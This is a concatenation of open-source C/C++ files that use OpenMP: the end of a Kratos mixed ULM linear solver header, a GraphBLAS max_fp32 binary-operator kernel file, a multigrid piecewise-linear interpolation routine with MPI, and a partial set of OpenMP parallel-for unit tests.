// temp += values[j]*values[j];
//
// diagA_vector[i] = std::sqrt(temp);
// }
// } else { // Otherwise
// #pragma omp parallel for
// for (int i=0; i< static_cast<int>(size_A); i++) {
// diagA_vector[i] = rA(i, i);
// }
// }
IndexType* ptr = new IndexType[size_A + 1];
ptr[0] = 0;
IndexType* aux_index2 = new IndexType[size_A];
double* aux_val = new double[size_A];
#pragma omp parallel for
for (int i = 0; i < static_cast<int>(size_A); i++) {
ptr[i+1] = i+1;
aux_index2[i] = i;
const double value = rA(i, i);
// const double value = diagA_vector[i];
if (std::abs(value) > Tolerance)
aux_val[i] = 1.0/value;
else // Auxiliar value
aux_val[i] = 1.0;
}
SparseMatrixMultiplicationUtility::CreateSolutionMatrix(rdiagA, size_A, size_A, ptr, aux_index2, aux_val);
delete[] ptr;
delete[] aux_index2;
delete[] aux_val;
}
/**
* @brief Checks if the degree of freedom belongs to a displacement DoF
* @param rDoF The degree of freedom
* @return True if the DoF corresponds with a displacement dof
*/
static inline bool IsDisplacementDof(const DofType& rDoF)
{
const auto& r_variable = rDoF.GetVariable();
if (r_variable == DISPLACEMENT_X ||
r_variable == DISPLACEMENT_Y ||
r_variable == DISPLACEMENT_Z) {
return true;
}
return false;
}
/**
* @brief Checks if the degree of freedom belongs to a LM DoF
* @param rDoF The degree of freedom
* @return True if the DoF corresponds with a LM dof
*/
static inline bool IsLMDof(const DofType& rDoF)
{
const auto& r_variable = rDoF.GetVariable();
if (r_variable == VECTOR_LAGRANGE_MULTIPLIER_X ||
r_variable == VECTOR_LAGRANGE_MULTIPLIER_Y ||
r_variable == VECTOR_LAGRANGE_MULTIPLIER_Z) {
return true;
}
return false;
}
/**
* @brief This method returns the defaulr parameters in order to avoid code duplication
* @return Returns the default parameters
*/
Parameters GetDefaultParameters()
{
Parameters default_parameters( R"(
{
"solver_type" : "mixed_ulm_linear_solver",
"tolerance" : 1.0e-6,
"max_iteration_number" : 200,
"echo_level" : 0
} )" );
return default_parameters;
}
///@}
///@name Private Access
///@{
///@}
///@name Private Inquiry
///@{
///@}
///@name Un accessible methods
///@{
///@}
}; // Class MixedULMLinearSolver
///@}
///@name Type Definitions
///@{
// Here one should use the KRATOS_CREATE_LOCAL_FLAG, but it does not play nice with template parameters
template<class TSparseSpaceType, class TDenseSpaceType, class TPreconditionerType, class TReordererType>
const Kratos::Flags MixedULMLinearSolver<TSparseSpaceType, TDenseSpaceType,TPreconditionerType, TReordererType>::BLOCKS_ARE_ALLOCATED(Kratos::Flags::Create(0));
template<class TSparseSpaceType, class TDenseSpaceType, class TPreconditionerType, class TReordererType>
const Kratos::Flags MixedULMLinearSolver<TSparseSpaceType, TDenseSpaceType,TPreconditionerType, TReordererType>::IS_INITIALIZED(Kratos::Flags::Create(1));
///@}
///@name Input and output
///@{
/// input stream function
template<class TSparseSpaceType, class TDenseSpaceType, class TPreconditionerType, class TReordererType>
inline std::istream& operator >> (std::istream& IStream,
MixedULMLinearSolver<TSparseSpaceType, TDenseSpaceType,TPreconditionerType, TReordererType>& rThis)
{
return IStream;
}
/// output stream function
template<class TSparseSpaceType, class TDenseSpaceType, class TPreconditionerType, class TReordererType>
inline std::ostream& operator << (std::ostream& rOStream,
const MixedULMLinearSolver<TSparseSpaceType, TDenseSpaceType,TPreconditionerType, TReordererType>& rThis)
{
rThis.PrintInfo (rOStream);
rOStream << std::endl;
rThis.PrintData (rOStream);
return rOStream;
}
///@}
} // namespace Kratos.
#endif // KRATOS_MIXEDULM_SOLVER_H_INCLUDED defined
|
GB_binop__max_fp32.c | //------------------------------------------------------------------------------
// GB_binop: hard-coded functions for each built-in binary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2021, All Rights Reserved.
// SPDX-License-Identifier: Apache-2.0
//------------------------------------------------------------------------------
// If this file is in the Generated2/ folder, do not edit it
// (it is auto-generated from Generator/*).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_emult.h"
#include "GB_control.h"
#include "GB_ek_slice.h"
#include "GB_dense.h"
#include "GB_atomics.h"
#include "GB_bitmap_assign_methods.h"
#include "GB_binop__include.h"
// C=binop(A,B) is defined by the following types and operators:
// A+B function (eWiseAdd): GB (_AaddB__max_fp32)
// A.*B function (eWiseMult): GB (_AemultB_01__max_fp32)
// A.*B function (eWiseMult): GB (_AemultB_02__max_fp32)
// A.*B function (eWiseMult): GB (_AemultB_03__max_fp32)
// A.*B function (eWiseMult): GB (_AemultB_bitmap__max_fp32)
// A*D function (colscale): GB (_AxD__max_fp32)
// D*A function (rowscale): GB (_DxB__max_fp32)
// C+=B function (dense accum): GB (_Cdense_accumB__max_fp32)
// C+=b function (dense accum): GB (_Cdense_accumb__max_fp32)
// C+=A+B function (dense ewise3): GB (_Cdense_ewise3_accum__max_fp32)
// C=A+B function (dense ewise3): GB (_Cdense_ewise3_noaccum__max_fp32)
// C=scalar+B GB (_bind1st__max_fp32)
// C=scalar+B' GB (_bind1st_tran__max_fp32)
// C=A+scalar GB (_bind2nd__max_fp32)
// C=A'+scalar GB (_bind2nd_tran__max_fp32)
// C type: float
// A type: float
// B,b type: float
// BinaryOp: cij = fmaxf (aij, bij)
#define GB_ATYPE \
float
#define GB_BTYPE \
float
#define GB_CTYPE \
float
// true if the types of A and B are identical
#define GB_ATYPE_IS_BTYPE \
1
// true if the types of C and A are identical
#define GB_CTYPE_IS_ATYPE \
1
// true if the types of C and B are identical
#define GB_CTYPE_IS_BTYPE \
1
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA,A_iso) \
float aij = GBX (Ax, pA, A_iso)
// bij = Bx [pB]
#define GB_GETB(bij,Bx,pB,B_iso) \
float bij = GBX (Bx, pB, B_iso)
// declare scalar of the same type as C
#define GB_CTYPE_SCALAR(t) \
float t
// cij = Ax [pA]
#define GB_COPY_A_TO_C(cij,Ax,pA,A_iso) \
cij = GBX (Ax, pA, A_iso)
// cij = Bx [pB]
#define GB_COPY_B_TO_C(cij,Bx,pB,B_iso) \
cij = GBX (Bx, pB, B_iso)
#define GB_CX(p) Cx [p]
// binary operator
#define GB_BINOP(z,x,y,i,j) \
z = fmaxf (x, y) ;
// true if the binop must be flipped
#define GB_BINOP_FLIP \
0
// op is second
#define GB_OP_IS_SECOND \
0
// do the numerical phases of GB_add and GB_emult
#define GB_PHASE_2_OF_2
// hard-coded loops can be vectorized
#define GB_PRAGMA_SIMD_VECTORIZE GB_PRAGMA_SIMD
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_MAX || GxB_NO_FP32 || GxB_NO_MAX_FP32)
//------------------------------------------------------------------------------
// C += A+B, all 3 matrices dense
//------------------------------------------------------------------------------
// The op must be MIN, MAX, PLUS, MINUS, RMINUS, TIMES, DIV, or RDIV.
void GB (_Cdense_ewise3_accum__max_fp32)
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix B,
const int nthreads
)
{
#include "GB_dense_ewise3_accum_template.c"
}
//------------------------------------------------------------------------------
// C = A+B, all 3 matrices dense
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_ewise3_noaccum__max_fp32)
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix B,
const int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_dense_ewise3_noaccum_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C += B, accumulate a sparse matrix into a dense matrix
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_accumB__max_fp32)
(
GrB_Matrix C,
const GrB_Matrix B,
const int64_t *B_ek_slicing, const int B_ntasks, const int B_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
{
#include "GB_dense_subassign_23_template.c"
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C += b, accumulate a scalar into a dense matrix
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_accumb__max_fp32)
(
GrB_Matrix C,
const GB_void *p_bwork,
const int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
{
// get the scalar b for C += b, of type float
float bwork = (*((float *) p_bwork)) ;
#include "GB_dense_subassign_22_template.c"
return (GrB_SUCCESS) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = A*D, column scale with diagonal D matrix
//------------------------------------------------------------------------------
GrB_Info GB (_AxD__max_fp32)
(
GrB_Matrix C,
const GrB_Matrix A, bool A_is_pattern,
const GrB_Matrix D, bool D_is_pattern,
const int64_t *A_ek_slicing, const int A_ntasks, const int A_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
float *restrict Cx = (float *) C->x ;
#include "GB_AxB_colscale_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = D*B, row scale with diagonal D matrix
//------------------------------------------------------------------------------
GrB_Info GB (_DxB__max_fp32)
(
GrB_Matrix C,
const GrB_Matrix D, bool D_is_pattern,
const GrB_Matrix B, bool B_is_pattern,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
float *restrict Cx = (float *) C->x ;
#include "GB_AxB_rowscale_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseAdd: C = A+B or C<M> = A+B
//------------------------------------------------------------------------------
GrB_Info GB (_AaddB__max_fp32)
(
GrB_Matrix C,
const int C_sparsity,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const bool Ch_is_Mh,
const int64_t *restrict C_to_M,
const int64_t *restrict C_to_A,
const int64_t *restrict C_to_B,
const GB_task_struct *restrict TaskList,
const int C_ntasks,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
GB_WERK_DECLARE (M_ek_slicing, int64_t) ;
GB_WERK_DECLARE (A_ek_slicing, int64_t) ;
GB_WERK_DECLARE (B_ek_slicing, int64_t) ;
#include "GB_add_template.c"
GB_FREE_WORK ;
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C = A.*B or C<M> = A.*B
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_01__max_fp32)
(
GrB_Matrix C,
const int C_sparsity,
const int ewise_method,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *restrict C_to_M,
const int64_t *restrict C_to_A,
const int64_t *restrict C_to_B,
const GB_task_struct *restrict TaskList,
const int C_ntasks,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_emult_01_meta.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C<#> = A.*B when A is sparse/hyper and B is bitmap/full
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_02__max_fp32)
(
GrB_Matrix C,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const bool flipxy,
const int64_t *restrict Cp_kfirst,
const int64_t *A_ek_slicing, const int A_ntasks, const int A_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#if GB_BINOP_FLIP
// The operator is not commutative, and does not have a flipped
// variant. For example z=atan2(y,x).
if (flipxy)
{
// use fmult(y,x)
#undef GB_FLIPPED
#define GB_FLIPPED 1
#include "GB_emult_02_template.c"
}
else
{
// use fmult(x,y)
#undef GB_FLIPPED
#define GB_FLIPPED 0
#include "GB_emult_02_template.c"
}
#else
// No need to handle the flip: the operator is either commutative, or
// has been handled by changing z=div(y,x) to z=rdiv(x,y) for example.
#undef GB_FLIPPED
#define GB_FLIPPED 0
#include "GB_emult_02_template.c"
#endif
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C<M> = A.*B, M sparse/hyper, A and B bitmap/full
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_03__max_fp32)
(
GrB_Matrix C,
const GrB_Matrix M,
const bool Mask_struct,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *restrict Cp_kfirst,
const int64_t *M_ek_slicing, const int M_ntasks, const int M_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_emult_03_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C=A.*B, C<M>=A.*B, C<!M>=A.*B where C is bitmap
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_bitmap__max_fp32)
(
GrB_Matrix C,
const int ewise_method,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *M_ek_slicing, const int M_ntasks, const int M_nthreads,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_bitmap_emult_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// Cx = op (x,Bx): apply a binary operator to a matrix with scalar bind1st
//------------------------------------------------------------------------------
GrB_Info GB (_bind1st__max_fp32)
(
GB_void *Cx_output, // Cx and Bx may be aliased
const GB_void *x_input,
const GB_void *Bx_input,
const int8_t *restrict Bb,
int64_t bnz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
float *Cx = (float *) Cx_output ;
float x = (*((float *) x_input)) ;
float *Bx = (float *) Bx_input ;
int64_t p ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < bnz ; p++)
{
if (!GBB (Bb, p)) continue ;
float bij = GBX (Bx, p, false) ;
Cx [p] = fmaxf (x, bij) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// Cx = op (Ax,y): apply a binary operator to a matrix with scalar bind2nd
//------------------------------------------------------------------------------
GrB_Info GB (_bind2nd__max_fp32)
(
GB_void *Cx_output, // Cx and Ax may be aliased
const GB_void *Ax_input,
const GB_void *y_input,
const int8_t *restrict Ab,
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int64_t p ;
float *Cx = (float *) Cx_output ;
float *Ax = (float *) Ax_input ;
float y = (*((float *) y_input)) ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < anz ; p++)
{
if (!GBB (Ab, p)) continue ;
float aij = GBX (Ax, p, false) ;
Cx [p] = fmaxf (aij, y) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = op (x, A'): transpose and apply a binary operator
//------------------------------------------------------------------------------
// cij = op (x, aij), no typecasting (in spite of the macro name)
#undef GB_CAST_OP
#define GB_CAST_OP(pC,pA) \
{ \
float aij = GBX (Ax, pA, false) ; \
Cx [pC] = fmaxf (x, aij) ; \
}
GrB_Info GB (_bind1st_tran__max_fp32)
(
GrB_Matrix C,
const GB_void *x_input,
const GrB_Matrix A,
int64_t *restrict *Workspaces,
const int64_t *restrict A_slice,
int nworkspaces,
int nthreads
)
{
// GB_unop_transpose.c uses GB_ATYPE, but A is
// the 2nd input to binary operator z=f(x,y).
#undef GB_ATYPE
#define GB_ATYPE \
float
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
float x = (*((const float *) x_input)) ;
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
#undef GB_ATYPE
#define GB_ATYPE \
float
}
//------------------------------------------------------------------------------
// C = op (A', y): transpose and apply a binary operator
//------------------------------------------------------------------------------
// cij = op (aij, y), no typecasting (in spite of the macro name)
#undef GB_CAST_OP
#define GB_CAST_OP(pC,pA) \
{ \
float aij = GBX (Ax, pA, false) ; \
Cx [pC] = fmaxf (aij, y) ; \
}
GrB_Info GB (_bind2nd_tran__max_fp32)
(
GrB_Matrix C,
const GrB_Matrix A,
const GB_void *y_input,
int64_t *restrict *Workspaces,
const int64_t *restrict A_slice,
int nworkspaces,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
float y = (*((const float *) y_input)) ;
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
|
interpolation_pl.c | //------------------------------------------------------------------------------------------------------------------------------
// Samuel Williams
// SWWilliams@lbl.gov
// Lawrence Berkeley National Lab
//------------------------------------------------------------------------------------------------------------------------------
#include <math.h>
//------------------------------------------------------------------------------------------------------------------------------
static inline void InterpolateBlock_PL(level_type *level_f, int id_f, double prescale_f, level_type *level_c, int id_c, blockCopy_type *block){
// interpolate 3D array from read_i,j,k of read[] to write_i,j,k in write[]
int write_dim_i = block->dim.i<<1; // calculate the dimensions of the resultant fine block
int write_dim_j = block->dim.j<<1;
int write_dim_k = block->dim.k<<1;
int read_i = block->read.i;
int read_j = block->read.j;
int read_k = block->read.k;
int read_jStride = block->read.jStride;
int read_kStride = block->read.kStride;
int write_i = block->write.i;
int write_j = block->write.j;
int write_k = block->write.k;
int write_jStride = block->write.jStride;
int write_kStride = block->write.kStride;
double * __restrict__ read = block->read.ptr;
double * __restrict__ write = block->write.ptr;
if(block->read.box >=0){
read = level_c->my_boxes[ block->read.box].vectors[ id_c] + level_c->my_boxes[ block->read.box].ghosts*(1+level_c->my_boxes[ block->read.box].jStride+level_c->my_boxes[ block->read.box].kStride);
read_jStride = level_c->my_boxes[block->read.box ].jStride;
read_kStride = level_c->my_boxes[block->read.box ].kStride;
}
if(block->write.box>=0){
write = level_f->my_boxes[block->write.box].vectors[id_f] + level_f->my_boxes[block->write.box].ghosts*(1+level_f->my_boxes[block->write.box].jStride+level_f->my_boxes[block->write.box].kStride);
write_jStride = level_f->my_boxes[block->write.box].jStride;
write_kStride = level_f->my_boxes[block->write.box].kStride;
}
int i,j,k;
for(k=0;k<write_dim_k;k++){
for(j=0;j<write_dim_j;j++){
for(i=0;i<write_dim_i;i++){
int write_ijk = ((i )+write_i) + (((j )+write_j)*write_jStride) + (((k )+write_k)*write_kStride);
int read_ijk = ((i>>1)+ read_i) + (((j>>1)+ read_j)* read_jStride) + (((k>>1)+ read_k)* read_kStride);
//
// | o | o |
// +---+---+---+---+
// | | x | x | |
//
// CAREFUL !!! you must guarantee you zero'd the MPI buffers(write[]) and destination boxes at some point to avoid 0.0*NaN or 0.0*inf
// piecewise linear interpolation... NOTE, BC's must have been previously applied
int delta_i= -1;if(i&0x1)delta_i= 1; // i.e. even points look backwards while odd points look forward
int delta_j=-read_jStride;if(j&0x1)delta_j=read_jStride;
int delta_k=-read_kStride;if(k&0x1)delta_k=read_kStride;
write[write_ijk] = prescale_f*write[write_ijk] +
0.421875*read[read_ijk ] +
0.140625*read[read_ijk +delta_k] +
0.140625*read[read_ijk +delta_j ] +
0.046875*read[read_ijk +delta_j+delta_k] +
0.140625*read[read_ijk+delta_i ] +
0.046875*read[read_ijk+delta_i +delta_k] +
0.046875*read[read_ijk+delta_i+delta_j ] +
0.015625*read[read_ijk+delta_i+delta_j+delta_k];
}}}
}
//------------------------------------------------------------------------------------------------------------------------------
// perform a (inter-level) piecewise linear interpolation
void interpolation_pl(level_type * level_f, int id_f, double prescale_f, level_type *level_c, int id_c){
exchange_boundary(level_c,id_c,0);
apply_BCs_linear(level_c,id_c);
uint64_t _timeCommunicationStart = CycleTime();
uint64_t _timeStart,_timeEnd;
int buffer=0;
int n;
#ifdef USE_MPI
// by convention, level_f allocates a combined array of requests for both level_f recvs and level_c sends...
int nMessages = level_c->interpolation.num_sends + level_f->interpolation.num_recvs;
MPI_Request *recv_requests = level_f->interpolation.requests;
MPI_Request *send_requests = level_f->interpolation.requests + level_f->interpolation.num_recvs;
// loop through packed list of MPI receives and prepost Irecv's...
_timeStart = CycleTime();
#ifdef USE_MPI_THREAD_MULTIPLE
#pragma omp parallel for schedule(dynamic,1)
#endif
for(n=0;n<level_f->interpolation.num_recvs;n++){
MPI_Irecv(level_f->interpolation.recv_buffers[n],
level_f->interpolation.recv_sizes[n],
MPI_DOUBLE,
level_f->interpolation.recv_ranks[n],
7, // by convention, piecewise linear interpolation uses tag=7
MPI_COMM_WORLD,
&recv_requests[n]
);
}
_timeEnd = CycleTime();
level_f->cycles.interpolation_recv += (_timeEnd-_timeStart);
// pack MPI send buffers...
_timeStart = CycleTime();
#pragma omp parallel for private(buffer) if(level_c->interpolation.num_blocks[0]>1) schedule(static,1)
for(buffer=0;buffer<level_c->interpolation.num_blocks[0];buffer++){InterpolateBlock_PL(level_f,id_f,0.0,level_c,id_c,&level_c->interpolation.blocks[0][buffer]);} // !!! prescale==0 because you don't want to increment the MPI buffer
_timeEnd = CycleTime();
level_f->cycles.interpolation_pack += (_timeEnd-_timeStart);
// loop through MPI send buffers and post Isend's...
_timeStart = CycleTime();
#ifdef USE_MPI_THREAD_MULTIPLE
#pragma omp parallel for schedule(dynamic,1)
#endif
for(n=0;n<level_c->interpolation.num_sends;n++){
MPI_Isend(level_c->interpolation.send_buffers[n],
level_c->interpolation.send_sizes[n],
MPI_DOUBLE,
level_c->interpolation.send_ranks[n],
7, // by convention, piecewise linear interpolation uses tag=7
MPI_COMM_WORLD,
&send_requests[n]
);
}
_timeEnd = CycleTime();
level_f->cycles.interpolation_send += (_timeEnd-_timeStart);
#endif
// perform local interpolation... try and hide within Isend latency...
_timeStart = CycleTime();
#pragma omp parallel for private(buffer) if(level_c->interpolation.num_blocks[1]>1) schedule(static,1)
for(buffer=0;buffer<level_c->interpolation.num_blocks[1];buffer++){InterpolateBlock_PL(level_f,id_f,prescale_f,level_c,id_c,&level_c->interpolation.blocks[1][buffer]);}
_timeEnd = CycleTime();
level_f->cycles.interpolation_local += (_timeEnd-_timeStart);
// wait for MPI to finish...
#ifdef USE_MPI
_timeStart = CycleTime();
if(nMessages)MPI_Waitall(nMessages,level_f->interpolation.requests,level_f->interpolation.status);
_timeEnd = CycleTime();
level_f->cycles.interpolation_wait += (_timeEnd-_timeStart);
// unpack MPI receive buffers
_timeStart = CycleTime();
#pragma omp parallel for private(buffer) if(level_f->interpolation.num_blocks[2]>1) schedule(static,1)
for(buffer=0;buffer<level_f->interpolation.num_blocks[2];buffer++){IncrementBlock(level_f,id_f,prescale_f,&level_f->interpolation.blocks[2][buffer]);}
_timeEnd = CycleTime();
level_f->cycles.interpolation_unpack += (_timeEnd-_timeStart);
#endif
level_f->cycles.interpolation_total += (uint64_t)(CycleTime()-_timeCommunicationStart);
}
|
test.c | #include <stdlib.h>
#include <check.h>
#include <omp.h>
START_TEST(omp_parallel_for)
{/*{{{*/
int a[128] = {0};
#pragma omp parallel for shared(a)
for(int i=0; i<128; i++)
{
a[i] = i;
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_num_threads_small)
{/*{{{*/
int a[128] = {0};
int num_threads_reqd = 2;
int num_threads;
#pragma omp parallel for shared(a) num_threads(num_threads_reqd)
for(int i=0; i<128; i++)
{
a[i] = i;
num_threads = omp_get_num_threads();
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
ck_assert_int_eq(num_threads, num_threads_reqd);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_parallel_for_num_threads_small)
{/*{{{*/
int a[128] = {0};
int num_threads;
int num_threads2;
#pragma omp parallel for shared(a)
for(int i=0; i<128; i++)
{
a[i] = 0;
num_threads = omp_get_num_threads();
}
#pragma omp parallel for shared(a) num_threads(num_threads/2)
for(int i=0; i<num_threads/2; i++)
{
a[i] = i;
num_threads2 = omp_get_num_threads();
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i >= num_threads2 ? 0 : i;
}
ck_assert_int_eq(sum, sum_gold);
ck_assert_int_eq(num_threads/2, num_threads2);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_static)
{/*{{{*/
int a[128] = {0};
#pragma omp parallel for shared(a) schedule(static)
for(int i=0; i<128; i++)
{
a[i] = i;
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_static_num_threads_small)
{/*{{{*/
int a[128] = {0};
int num_threads_reqd = 2;
int num_threads;
#pragma omp parallel for shared(a) schedule(static) num_threads(num_threads_reqd)
for(int i=0; i<128; i++)
{
a[i] = i;
num_threads = omp_get_num_threads();
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
ck_assert_int_eq(num_threads, num_threads_reqd);
}/*}}}*/
END_TEST
// TODO: Add test for teams larger than number of MIR workers.
// Large teams are unsupported in MIR.
// The test should therefore pass if MIR throws an assertion.
START_TEST(omp_parallel_for_static_reduction)
{/*{{{*/
int a[128] = {0};
for(int i=0; i<128; i++)
{
a[i] = i;
}
int sum = 0;
#pragma omp parallel for shared(a) schedule(static) reduction(+: sum)
for(int i=0; i<128; i++)
{
sum = sum + a[i];
}
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum_gold += a[i];
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_static_reduction_num_threads_one)
{/*{{{*/
int a[128] = {0};
for(int i=0; i<128; i++)
{
a[i] = i;
}
int sum = 0;
#pragma omp parallel for shared(a) schedule(static) reduction(+: sum) num_threads(1)
for(int i=0; i<128; i++)
{
sum = sum + a[i];
}
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum_gold += a[i];
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_dynamic)
{/*{{{*/
int a[128] = {0};
#pragma omp parallel for shared(a) schedule(dynamic)
for(int i=0; i<128; i++)
{
a[i] = i;
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_dynamic_num_threads_small)
{/*{{{*/
int a[128] = {0};
int num_threads_reqd = 2;
int num_threads;
#pragma omp parallel for shared(a) schedule(dynamic) num_threads(num_threads_reqd)
for(int i=0; i<128; i++)
{
a[i] = i;
num_threads = omp_get_num_threads();
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
ck_assert_int_eq(num_threads, num_threads_reqd);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_dynamic_reduction)
{/*{{{*/
int a[128] = {0};
for(int i=0; i<128; i++)
{
a[i] = i;
}
int sum = 0;
#pragma omp parallel for shared(a) schedule(dynamic) reduction(+: sum)
for(int i=0; i<128; i++)
{
sum = sum + a[i];
}
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum_gold += a[i];
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_dynamic_reduction_num_threads_one)
{/*{{{*/
int a[128] = {0};
for(int i=0; i<128; i++)
{
a[i] = i;
}
int sum = 0;
#pragma omp parallel for shared(a) schedule(dynamic) reduction(+: sum) num_threads(1)
for(int i=0; i<128; i++)
{
sum = sum + a[i];
}
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum_gold += a[i];
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_guided)
{/*{{{*/
int a[128] = {0};
#pragma omp parallel for shared(a) schedule(guided)
for(int i=0; i<128; i++)
{
a[i] = i;
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_guided_num_threads_small)
{/*{{{*/
int a[128] = {0};
int num_threads_reqd = 2;
int num_threads;
#pragma omp parallel for shared(a) schedule(guided) num_threads(num_threads_reqd)
for(int i=0; i<128; i++)
{
a[i] = i;
num_threads = omp_get_num_threads();
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
ck_assert_int_eq(num_threads, num_threads_reqd);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_guided_reduction)
{/*{{{*/
int a[128] = {0};
for(int i=0; i<128; i++)
{
a[i] = i;
}
int sum = 0;
#pragma omp parallel for shared(a) schedule(guided) reduction(+: sum)
for(int i=0; i<128; i++)
{
sum = sum + a[i];
}
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum_gold += a[i];
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_guided_reduction_num_threads_one)
{/*{{{*/
int a[128] = {0};
for(int i=0; i<128; i++)
{
a[i] = i;
}
int sum = 0;
#pragma omp parallel for shared(a) schedule(guided) reduction(+: sum) num_threads(1)
for(int i=0; i<128; i++)
{
sum = sum + a[i];
}
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum_gold += a[i];
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_runtime)
{/*{{{*/
int a[128] = {0};
#pragma omp parallel for shared(a) schedule(runtime)
for(int i=0; i<128; i++)
{
a[i] = i;
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
